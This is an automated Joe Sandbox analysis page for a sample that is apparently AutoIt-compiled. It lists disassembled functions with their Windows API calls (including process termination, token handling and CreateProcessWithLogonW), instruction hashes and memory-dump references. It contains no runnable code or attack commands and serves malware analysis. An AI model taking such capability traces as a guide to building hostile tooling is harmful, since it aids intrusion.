Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 9779100c20381f4d0890b9a35e15774b576cb049938e9aa9420eb1100c9f645f
Instruction ID: ca1257674d924b37f8fd54a7b9e0b8a97d222978a4c180ffa5601df8c0d3e2d9
Opcode Fuzzy Hash: 9779100c20381f4d0890b9a35e15774b576cb049938e9aa9420eb1100c9f645f
Instruction Fuzzy Hash: 1A516CB5A00209DFCB14CF58C884AAAB7F8FF4C314B15856AEE59DB345E734E915CBA0

Function 00F6220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F622A3
IsMenu.USER32(00000000), ref: 00F622C3
CreatePopupMenu.USER32 ref: 00F622F7
GetMenuItemCount.USER32(000000FF), ref: 00F62355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F62386

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
Instruction ID: 9e48ad41b37f5776c36255786979e2ee5a268327eb419b4880a109f7eeb7a4f6
Opcode Fuzzy Hash: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
Instruction Fuzzy Hash: 9051CF70A00B4AEFDF61CF68C889BADBBF5BF05324F144129E815AB391D7788944EB51

Function 00F01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00F0179A
GetWindowRect.USER32(?,?), ref: 00F017FE
ScreenToClient.USER32(?,?), ref: 00F0181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F0182C
EndPaint.USER32(?,?), ref: 00F01876

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 4a13dcb5417a29af3667bfeb9263bc685d95a2dba5505db2770c2704bfdfa844
Instruction ID: d4cd30c1babcdbb66c103342e6df753d6b6b2c4f2b9dc7f0ff8c79fb44b389b2
Opcode Fuzzy Hash: 4a13dcb5417a29af3667bfeb9263bc685d95a2dba5505db2770c2704bfdfa844
Instruction Fuzzy Hash: 0C417B31504604AFD710DF24CC89FBA7BE8FB4A724F144629FAA48B2E1D731A945FB61

Function 00F8B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00FC57B0,00000000,018C59C8,?,?,00FC57B0,?,00F8B5A8,?,?), ref: 00F8B712
EnableWindow.USER32(00000000,00000000), ref: 00F8B736
ShowWindow.USER32(00FC57B0,00000000,018C59C8,?,?,00FC57B0,?,00F8B5A8,?,?), ref: 00F8B796
ShowWindow.USER32(00000000,00000004,?,00F8B5A8,?,?), ref: 00F8B7A8
EnableWindow.USER32(00000000,00000001), ref: 00F8B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F8B7EF

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
Instruction ID: 4f2ac1f03f9eab722e162f7a7ece04fa8ad92f28ff0da33b417b02b61587bba5
Opcode Fuzzy Hash: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
Instruction Fuzzy Hash: 4F418634A00344AFDB21DF24C499BD97BE1FF49320F5841B9F9488F6A2C731A85AEB50

Function 00F7709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00F74E41,?,?,00000000,00000001), ref: 00F770AC

Part of subcall function 00F739A0: GetWindowRect.USER32(?,?), ref: 00F739B3

GetDesktopWindow.USER32 ref: 00F770D6
GetWindowRect.USER32(00000000), ref: 00F770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F7710F

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

GetCursorPos.USER32(?), ref: 00F7713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F77199

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 16933a60f6ac59c754136d1ea13fdf8a404f68cfb40465792839d4e2514caa2f
Instruction ID: 885d33c5581a2a5995ac81081fd5a60a32290a92e45dbdadb8198e4f8a12b1b6
Opcode Fuzzy Hash: 16933a60f6ac59c754136d1ea13fdf8a404f68cfb40465792839d4e2514caa2f
Instruction Fuzzy Hash: C831D472505309AFD720EF14DC49F9BB7AAFF88314F00091AF58997191C774EA09DB92

Function 00F58879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F580C0
Part of subcall function 00F580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F580CA
Part of subcall function 00F580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F580D9
Part of subcall function 00F580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F580E0
Part of subcall function 00F580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F580F6

GetLengthSid.ADVAPI32(?,00000000,00F5842F), ref: 00F588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F588D6
HeapAlloc.KERNEL32(00000000), ref: 00F588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00F588F6
GetProcessHeap.KERNEL32(00000000,00000000,00F5842F), ref: 00F5890A
HeapFree.KERNEL32(00000000), ref: 00F58911

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7e5120b0a268fa1dd05becad80ffdd62fcbfb4732e9765797ca66c2422a668a3
Instruction ID: d4088d442535d61e39f63c30cc5a0d32977b8489d6793b26a5d84095c756710d
Opcode Fuzzy Hash: 7e5120b0a268fa1dd05becad80ffdd62fcbfb4732e9765797ca66c2422a668a3
Instruction Fuzzy Hash: B511B431901609FFDB109F94DC09BFE7B68EB44766F104028E945E7111CB32AD1AEB60

Function 00F585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F585E2
OpenProcessToken.ADVAPI32(00000000), ref: 00F585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F585F8
CloseHandle.KERNEL32(00000004), ref: 00F58603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F58632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00F58646

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
Instruction ID: 3f158d0047b9f8859c6339e84ccf95bcbf553b35a90a61f347ddd021ec8580e4
Opcode Fuzzy Hash: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
Instruction Fuzzy Hash: F911597250120DAFDF018FA4DD49BEE7BA9EF08365F144064FE05A2160C7728E69EB60

Function 00F5B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F5B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F5B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F5B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00F5B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F5B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00F5B7FE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 04aaf6fcb2eb087428ac01fe52fbacc6cc283887703d23ce2cdbf136d1a485c5
Instruction ID: e76be02ccb37f2413483f381c953a2bf1a1290bab80778b5746d9e8b58ca7fd1
Opcode Fuzzy Hash: 04aaf6fcb2eb087428ac01fe52fbacc6cc283887703d23ce2cdbf136d1a485c5
Instruction Fuzzy Hash: E2017175E00209BFEF109BA69C49A5ABFA8EB48321F004065FE04A7291D6309C14DF90

Function 00F20162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F20193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00F2019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00F201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F201C1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
Instruction ID: b63b1ed99d3558e57c06ccf037da18100162a780460c0466a8eff19ff6934dc8
Opcode Fuzzy Hash: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
Instruction Fuzzy Hash: 19016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A868CBE5

Function 00F653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6540F
GetWindowThreadProcessId.USER32(?,?), ref: 00F6541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F65437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6543E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
Instruction ID: 2303ead49ae53af4df125e4175c5797abaa0c429dce9278b03d20a43c02512c1
Opcode Fuzzy Hash: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
Instruction Fuzzy Hash: CDF06D3224055CBFE3205BA29C0DEFB7A7CEFCAB11F000269FA04D1050EAA01A05A7B5

Function 00F67230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00F67243
EnterCriticalSection.KERNEL32(?,?,00F10EE4,?,?), ref: 00F67254
TerminateThread.KERNEL32(00000000,000001F6,?,00F10EE4,?,?), ref: 00F67261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F10EE4,?,?), ref: 00F6726E

Part of subcall function 00F66C35: CloseHandle.KERNEL32(00000000,?,00F6727B,?,00F10EE4,?,?), ref: 00F66C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67281
LeaveCriticalSection.KERNEL32(?,?,00F10EE4,?,?), ref: 00F67288

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
Instruction ID: 3adba22b04fc62c0cc0bd7ecb3c0a3239dfd1b14820fe7866a609fb4b0c24632
Opcode Fuzzy Hash: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
Instruction Fuzzy Hash: 95F05E36540616EFD7112B64ED4C9EB7729EF45712B100531F503A10A0DB7A5819EB50

Function 00F58992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5899D
UnloadUserProfile.USERENV(?,?), ref: 00F589A9
CloseHandle.KERNEL32(?), ref: 00F589B2
CloseHandle.KERNEL32(?), ref: 00F589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00F589C3
HeapFree.KERNEL32(00000000), ref: 00F589CA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
Instruction ID: 98210cbed9a9b1b395ac69c2c48f6ba8d0334c326caaf5aef884e3bff8000aa1
Opcode Fuzzy Hash: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
Instruction Fuzzy Hash: C6E05276104509FFDA011FE5EC0C9AABB69FB89762B508631F219C1474CB329469EB50

Function 00F785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F78613
CharUpperBuffW.USER32(?,?), ref: 00F78722
VariantClear.OLEAUT32(?), ref: 00F7889A

Part of subcall function 00F67562: VariantInit.OLEAUT32(00000000), ref: 00F675A2
Part of subcall function 00F67562: VariantCopy.OLEAUT32(00000000,?), ref: 00F675AB
Part of subcall function 00F67562: VariantClear.OLEAUT32(00000000), ref: 00F675B7

Strings

AUTOIT.ERROR, xrefs: 00F78728
Incorrect Parameter format, xrefs: 00F7864B, 00F7880D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: fda27212d4f1698c17ffc3cbb3db537920a814eb94bac8f0821b42115e6cd886
Instruction ID: a7a43ff49993297614a983764cf6b637f870494ccc7a5ab01052d807c941965c
Opcode Fuzzy Hash: fda27212d4f1698c17ffc3cbb3db537920a814eb94bac8f0821b42115e6cd886
Instruction Fuzzy Hash: FA918271A08301DFC710DF24C88495AB7E4EF89754F14896EF84A8B392DB34ED06EB52

Function 00F62A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

_memset.LIBCMT ref: 00F62B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F62BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F62C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F62C97

Strings

0, xrefs: 00F62B73

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: e46859a035bcdda293b6ec377b4b65819d9a37e4ca1b21a6ddbd5cea6e6f2119
Instruction ID: 015d8299f2d8e7d47bb00ddfb7a39cb1cd53ceb34c6238b20ace81a76e311243
Opcode Fuzzy Hash: e46859a035bcdda293b6ec377b4b65819d9a37e4ca1b21a6ddbd5cea6e6f2119
Instruction Fuzzy Hash: EC51CC71A08B019ED7A49F28D845A6FB7E8EF99330F040A2DF881D72D1DB64DD44B792

Function 00F5D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F5D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F5D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F5D69D

Strings

DllGetClassObject, xrefs: 00F5D610

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File
